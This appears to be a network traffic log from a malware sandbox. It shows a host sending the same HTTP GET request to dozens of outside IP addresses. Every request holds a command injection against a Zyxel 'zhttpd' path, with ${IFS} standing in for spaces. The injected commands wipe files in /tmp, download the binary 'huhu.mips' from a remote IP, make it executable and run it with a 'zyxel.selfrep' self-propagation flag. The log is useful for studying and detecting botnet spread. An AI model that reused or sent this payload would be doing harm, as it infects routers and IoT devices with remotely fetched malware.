                                                      Feb 2, 2024 06:35:00.091058016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      199192.168.2.1446778155.186.66.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:00.091115952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      200192.168.2.1457802189.167.134.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:00.091160059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      201192.168.2.145649823.231.21.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:00.091175079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      202192.168.2.144351496.185.183.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:00.091204882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      203192.168.2.145983061.215.244.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122755051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      204192.168.2.143884218.90.34.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122786045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      205192.168.2.1434146203.21.106.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122791052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      206192.168.2.1460954210.65.189.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122842073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      207192.168.2.1460964195.103.60.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122889042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      208192.168.2.145829263.94.108.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122895956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      209192.168.2.1441144116.34.82.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122910023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      210192.168.2.1437854150.232.85.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122947931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      211192.168.2.1445858110.15.148.121443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122980118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      212192.168.2.1435354205.228.214.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.122997046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      213192.168.2.1451536121.89.56.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123002052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      214192.168.2.1460550135.145.124.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123033047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      215192.168.2.1452236173.84.73.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123049974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      216192.168.2.1452324223.144.4.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123101950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      217192.168.2.1448010104.83.190.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123102903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      218192.168.2.144420419.88.17.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123147011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      219192.168.2.14343908.183.25.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123161077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      220192.168.2.143853817.100.47.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123172998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      221192.168.2.1443150160.204.168.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123193026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      222192.168.2.145013249.249.116.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123224020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      223192.168.2.1442086118.221.211.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123248100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      224192.168.2.1440686174.21.234.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123270988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      225192.168.2.145793292.35.208.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123286963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      226192.168.2.144714694.200.56.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123310089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      227192.168.2.1454202187.152.240.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123369932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      228192.168.2.144479496.245.216.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123370886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      229192.168.2.145910460.225.209.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123415947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      230192.168.2.145598257.209.92.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123457909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      231192.168.2.1453482113.227.225.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123457909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      232192.168.2.145204452.163.78.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123464108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      233192.168.2.1437348126.19.230.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123501062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      234192.168.2.1453892143.112.211.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123528004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      235192.168.2.144809280.38.202.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123543024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      236192.168.2.145881241.178.174.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123550892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      237192.168.2.145309631.113.174.252443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123604059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      238192.168.2.1435624219.228.200.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123605013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      239192.168.2.1453158124.155.189.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123622894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      240192.168.2.143656248.121.44.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123652935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      241192.168.2.1433014157.62.41.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123682022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      242192.168.2.1458556123.91.153.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123698950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      243192.168.2.1452490201.135.229.236443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123717070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      244192.168.2.143378695.141.177.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123756886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      245192.168.2.1458462187.140.174.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123788118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      246192.168.2.1446068218.169.225.230443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123817921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      247192.168.2.143970299.52.217.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123819113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      248192.168.2.1449054124.51.221.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123862982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      249192.168.2.1436174155.157.255.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123866081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      250192.168.2.143992454.242.70.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123898029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      251192.168.2.1455332140.89.20.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123908043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      252192.168.2.145299878.0.50.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123943090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      253192.168.2.144275299.129.101.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.123970985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      254192.168.2.144773462.5.131.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124005079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      255192.168.2.143751853.43.84.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124026060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      256192.168.2.144815895.143.217.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124053955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      257192.168.2.1443168133.61.152.126443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124092102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      258192.168.2.1433232122.42.242.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124103069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      259192.168.2.14376069.26.68.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124114037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      260192.168.2.1459722196.254.194.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:01.124144077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      261192.168.2.145021863.107.110.75443
                                                      TimestampBytes transferredDirectionData
